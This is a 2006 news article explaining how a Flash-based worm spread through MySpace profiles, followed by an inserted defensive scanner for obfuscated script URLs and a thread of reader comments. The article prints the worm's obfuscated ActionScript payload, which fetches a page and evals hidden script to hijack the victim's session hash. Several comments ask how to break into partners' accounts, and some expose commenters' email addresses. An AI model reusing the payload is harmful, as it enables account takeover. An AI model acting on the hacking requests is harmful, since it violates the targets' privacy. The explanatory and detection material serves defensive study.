Hacking MySpace: How Flash & AJAX Based Worm Works
By Angsuman Chakraborty, Gaea News Network
Tuesday, July 18, 2006
MySpace has been infected by a Flash-based (.swf) worm that is spreading rapidly through the site. It embeds JavaScript code into users’ profiles that redirects visitors to a site claiming the U.S. government was behind the 9/11 terrorist attacks, Symantec warned Monday. However, it may be just the tip of the iceberg. Let’s take a look at how it works to understand how easily it could be modified to deliver much more devastating payloads.
The unnamed worm isn’t malicious, but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file. This can easily replicate the “Samy is my friend” worm without breaking a sweat.
This JavaScript code would then be interpreted in the browser of any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and allowing operations to be performed on behalf of that user (without consent, obviously). Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site.
If the payload is malicious, it can carry out secondary attacks, such as targeting recently discovered vulnerabilities affecting Microsoft Office content. The impact would be much higher, exposing even sensitive information on your hard disk.
Let’s take a look at the worm, thanks to research by kinematic.theory:
When you visit an already infected page, there is an embedded Flash object (“redirect.swf”) which contains the ActionScript:
getURL("url");
It opens and redirects you to the specified blog URL.
On this blog URL there is another Flash file embedded, “retrievecookie.swf”. It contains:
getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'https://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'
\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};" + "eval(sc);}};" + "x.send(null);", "");
It opens another blog post (link) and evaluates its contents.
This code retrieves your MySpace hash, which allows anyone to act as you on MySpace and perform any operation on your behalf, such as changing your password or adding an unknown person as your friend: anything you can do on MySpace. Currently the code adds a message to your MySpace profile. It makes extensive use of AJAX for its operations.
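The retrievecookie.swf payload writes its URL scheme as javas\n\rcript:, so a plain substring match on "javascript:" misses it. As an added example (not part of the original article or the research it cites), the following JavaScript shows how a defender could scan decompiled ActionScript for getURL() targets that resolve to a script scheme once escapes are decoded and whitespace and control characters are stripped; the function names and the sample lines are constructed for illustration.

```javascript
// Added example: sample input and helper names are constructed for illustration.
const SCRIPT_SCHEMES = new Set(["javascript", "vbscript"]);

// Decode the escape sequences found in an ActionScript string literal.
function unescapeLiteral(s) {
  return s.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g, (_, e) => {
    if (e === "n") return "\n";
    if (e === "r") return "\r";
    if (e === "t") return "\t";
    if (e.length > 1) return String.fromCharCode(parseInt(e.slice(1), 16));
    return e; // \" \' \\ and unknown escapes yield the character itself
  });
}

// Return the lowercased scheme after removing whitespace and control
// characters, which is how "javas\n\rcript:" collapses to "javascript:".
function normalizedScheme(url) {
  const cleaned = url.replace(/[\u0000-\u0020\u007f]+/g, "");
  const m = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Report every getURL("...") call whose first argument is a script URL.
function findScriptGetURLs(actionScript) {
  const re = /getURL\s*\(\s*(["'])((?:\\[\s\S]|(?!\1)[^\\])*)\1/g;
  const findings = [];
  let m;
  while ((m = re.exec(actionScript)) !== null) {
    const scheme = normalizedScheme(unescapeLiteral(m[2]));
    if (scheme !== null && SCRIPT_SCHEMES.has(scheme)) {
      const line = actionScript.slice(0, m.index).split("\n").length;
      findings.push({ line, scheme, literal: m[2] });
    }
  }
  return findings;
}

// Constructed ActionScript lines; backslashes are literal, as in decompiler output.
const SAMPLE = [
  'getURL("http://example.com/blog");',
  'getURL("javas\\n\\rcript: var x = 1;", "");',
  'getURL("JaVa\\tScRiPt:void(0)");',
  'getURL("/relative/path");',
].join("\n");

for (const f of findScriptGetURLs(SAMPLE)) {
  console.log(`line ${f.line}: ${f.scheme} URL in getURL(): ${f.literal}`);
}
```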
August 24, 2009: 6:50 pm
Wow, you people amaze ‘me’. “I MUST HACK MY LOVERS PAGE BECAUSE I DONT TRUST THEM”. I would guess that that insecurity right there and a fear you just can not stop thinking about, just made it happen. if not and they are, I dunno… common sense? Not what this is for, and not something people will not just ‘tell you’ how to do. I remember this when this happened. Also, if you are not smart enough in how to fix or reset your password, then I suggest going and taking your computer back to wherever you bought it. And tell them you are too stupid to own a computer and fail to read anything of importance. Grow up. As for Flash on myspace. They still have a hole. Not as has as before. But still able to do some remote scripting with Flash and a PHP file on another host. Like what I am doing now in my profile. Linked by website in this post. Unfortunately they now disabled all getURL and any links embedded within flash. |
jennifer |
June 15, 2009: 6:29 am
Well for everyone who has lost your password why not send in a salute to myspace if you are the owner of that account and tell them to change your email to your new one and pick a new pass. I had lost my account numbers of times for my ex, and a salute got me back my account. There really is no need to hack to get your account back. And for everyone trying to check up on their b/f g/f get a life and stop worrying if they are cheating maybe they are. life goes on there is a reason why you're not with them or that they are cheating figure it out for yourself and hire a detective its that simple then beating around the bush to hack into their account to find nothing! Hackers don't waste their time on that stuff they got better reasons to be hacking besides your relationship drama. |
Angel |
June 6, 2009: 5:25 am
My brother’s myspace account was hacked and they changed everything, password and email, plus did this whole “gay pride” thing with the background and gender and all sorts of stuff. Well I want to make sure it doesn’t happen to me. Could you please email me some tips on how to avoid being hacked? I use Firefox for everything but my schoolwork, which I use IE6 cuz my school doesn’t seem to agree with Firefox. Please help me. webtreats@yahoo.com |
henrie |
May 27, 2009: 3:30 pm
hey guyz if any of u out der knowz how to hack myspace…pls let me know…itz very urgent..pls tell me how if anyone knows… |
henrie |
May 27, 2009: 3:27 pm
hey if any of u out there knows how to hack myspace…pls tell me…i’v benn tryin 2 find that out for a long time……pls..if anyone knows.pls let me know.. |
Leslie |
March 4, 2009: 8:11 am
I can’t remember my MySpace password. Can you help me? my email to login is lesliesnead@gamewood.net, but i no longer have access to that email address. my userid for myspace is lsnead. |
mells |
March 4, 2009: 8:09 am
i need to hack onto my bfs myspace will i be able to do that without an email or password??? and im confused on how to hack a myspace. |
droopz |
February 7, 2009: 5:16 am
can u please hack my myspace for me and send me the password because i think one of my friends hacked it and changed the password and now i cant get into it |
LUIS |
July 19, 2008: 9:53 pm
NEED HELP WITH FIANCES MYSPACE PASSWORD HER USER NAME IS CHINADOLL@HOTMAIL.COM |
i need help |
June 7, 2008: 1:08 pm
i need my gfs myspace hackd |
i need help |
ryan |
June 7, 2008: 1:05 pm
some one help me hack into my girls myspaces and email me back with the password |
rj |
June 7, 2008: 1:04 pm
i need this myspace hacked could you get the password and email me back with it |
Majishion |
May 21, 2008: 2:40 pm
someone help me get into this girls myspace pinoyboy07@msn.com mine is speed_limithm@yahoo.com |
anna |
April 26, 2008: 2:55 pm
how do i look at one of my friends myspace messages i want to know how to read other people’s messages |
jamie |
April 18, 2008: 1:25 am
i need help logging into an account,long story,lets just say i had the password,for got the password,and now need the password bad i have to meet sum1 in about 24 hours,so yea i need help getin into it they r tellin me where to meet them on there and it has to do with a funeral. |
zak anwar |
February 1, 2008: 6:56 pm
hi thanks |
January 28, 2008: 7:44 pm
I forgot my password on myspace, and now i cant log in. Do u think u could hack my myspace and get it for me and email it to smile_glenda@hotmail.com The url is https://www.myspace.com/glenda_b and the email address i used to log in is asain_barbie3@yahoo.com thank you so much:) |
Margaret. |
January 9, 2008: 4:04 pm
i want to know how to get into other peoples myspace messages. Please:) |
STAMPED GURL |
December 28, 2007: 3:40 pm
I NEED HELP MA BF I THINK IS CHEATIN ON ME … WILL U HELP ME HACK HIS MYSPACE IF U HAVE A ANSWER PLEASE TYPE ME !! IM SO CRUSHED RIGHT NOW SOOO PLZ HELP ME SO THIS |
Billy Bob |
December 24, 2007: 3:34 am
Im lazy ive circled the web on this issue. Iamreallybillgates@yahoo.com is a ghost i created today. I want to buy the myspace hash extractor or at least barter for it. I will do some slave work for u on the web or somethin. give me the link or somethin I have no excuse but after a few hours of circles my option is begging to buy it i dont need a hand out. Rape my email address i dont care just somebody send me a damn good link. I run mac so dont bother with mini pc bugs if its a zip. |
kaila wake |
December 15, 2007: 5:31 pm
Hello, Thank you very much for your time* |
jessica good |
loser |
November 18, 2007: 1:40 am
Please help me read some1 else messages i need to get into there myspace nbox |
dani |
Jesse |
October 3, 2007: 10:13 pm
Say i share myspace with my better half, and she keeps deleting our mail before i can get a chance to read the account is in my name so you shouldn’t have any issues helpin me out. I’m lookin for a code that will make it impossible to delete my inbox mail? Until removing the code of course. |
Jessy |
August 2, 2007: 5:53 pm
My boyfriend and I have kept getting into arguments because of people on myspace and we both decided to delete it. I deleted mine but he hasn’t deleted his. Is there anyway that you guys tell me how to hack into his myspace so he can learn what promises are?! thanks I would really appreciate it. |
July 10, 2007: 10:54 am
Someone hacked into my myspace.I think i no who it is. Can someone help me on how no hack into someones myspace.Thanks! MA aim sn is watunobotdat15 |
kiddoh:D